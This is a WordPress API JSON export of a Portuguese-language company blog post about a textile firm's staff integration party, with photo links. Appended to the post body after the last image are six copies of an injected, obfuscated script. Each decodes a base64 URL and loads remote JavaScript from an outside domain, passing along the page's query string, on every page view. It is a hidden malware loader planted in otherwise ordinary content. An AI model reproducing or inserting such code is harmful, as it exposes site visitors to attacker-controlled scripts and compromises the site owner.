{"id":1423,"date":"2022-08-25T11:01:14","date_gmt":"2022-08-25T14:01:14","guid":{"rendered":"https:\/\/www.urbanotextil.com.br\/?p=1423"},"modified":"2024-09-20T20:52:42","modified_gmt":"2024-09-20T23:52:42","slug":"urbano-textil-comemora-retomada-do-evento-de-festa-da-integracao","status":"publish","type":"post","link":"https:\/\/www.urbanotextil.com.br\/en\/urbano-textil-comemora-retomada-do-evento-de-festa-da-integracao\/","title":{"rendered":"Urbano T\u00eaxtil comemora retomada do evento de Festa da Integra\u00e7\u00e3o"},"content":{"rendered":"<p>Depois de dois anos em per\u00edodo de pandemia, no qual visamos manter o cuidado com nossos colaboradores, neste ano retomamos o evento da Festa de Integra\u00e7\u00e3o. \ud83c\udf89<br \/>\nNeste m\u00eas, reunimos nossos colaboradores para um s\u00e1bado animado e repleto de atividades. Al\u00e9m de din\u00e2micas, jogos, atra\u00e7\u00f5es e show musical, o momento tamb\u00e9m foi marcado pela homenagem aos colaboradores que completaram 10 anos de empresa no ano de 2022. No local, nossos colaboradores ainda desfrutaram de um delicioso caf\u00e9 da manh\u00e3 e aquele almo\u00e7o no capricho, deixando esse momento ainda mais completo e especial! Agradecemos a presen\u00e7a de todos que estiveram com a gente neste dia e tornaram o evento ainda mais incr\u00edvel!<\/p>\n<p>Confira abaixo alguns registros deste dia!<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-medium wp-image-1426\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:200\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00042.jpeg\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" class=\"alignnone size-medium wp-image-1432\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:200\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00025-1.jpeg\" alt=\"\" \/><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" width=\"1365\" height=\"2048\" class=\"alignnone size-medium wp-image-1427\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:200\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00142.jpeg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00142.jpeg 1365w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00142-200x300.jpeg 200w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00142-1024x1536.jpeg 1024w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00142-8x12.jpeg 8w\" sizes=\"(max-width: 1365px) 100vw, 1365px\" \/><\/p>\n<p><img decoding=\"async\" width=\"2048\" height=\"1365\" class=\"alignnone size-medium wp-image-1428\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:300\/h:200\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00209.jpeg\" alt=\"\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00209.jpeg 2048w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00209-300x200.jpeg 300w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00209-1536x1024.jpeg 1536w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2022\/08\/image00209-18x12.jpeg 18w\" sizes=\"(max-width: 2048px) 100vw, 2048px\" \/><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Depois de dois anos em per\u00edodo de pandemia, no qual visamos manter o cuidado com nossos colaboradores, neste ano retomamos o evento da Festa de Integra\u00e7\u00e3o. \ud83c\udf89 Neste m\u00eas, reunimos nossos colaboradores para um s\u00e1bado animado e repleto de atividades. Al\u00e9m de din\u00e2micas, jogos, atra\u00e7\u00f5es e show musical, o momento tamb\u00e9m foi marcado pela homenagem [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":1431,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","footnotes":""},"categories":[65],"tags":[],"wt_blog_author":[47],"class_list":["post-1423","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eventos","wt_blog_author-ludimila-martinelli"],"_links":{"self":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1423","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/comments?post=1423"}],"version-history":[{"count":8,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1423\/revisions"}],"predecessor-version":[{"id":2141,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/1423\/revisions\/2141"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media\/1431"}],"wp:attachment":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media?parent=1423"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/categories?post=1423"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/tags?post=1423"},{"taxonomy":"wt_blog_author","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/wt_blog_author?post=1423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}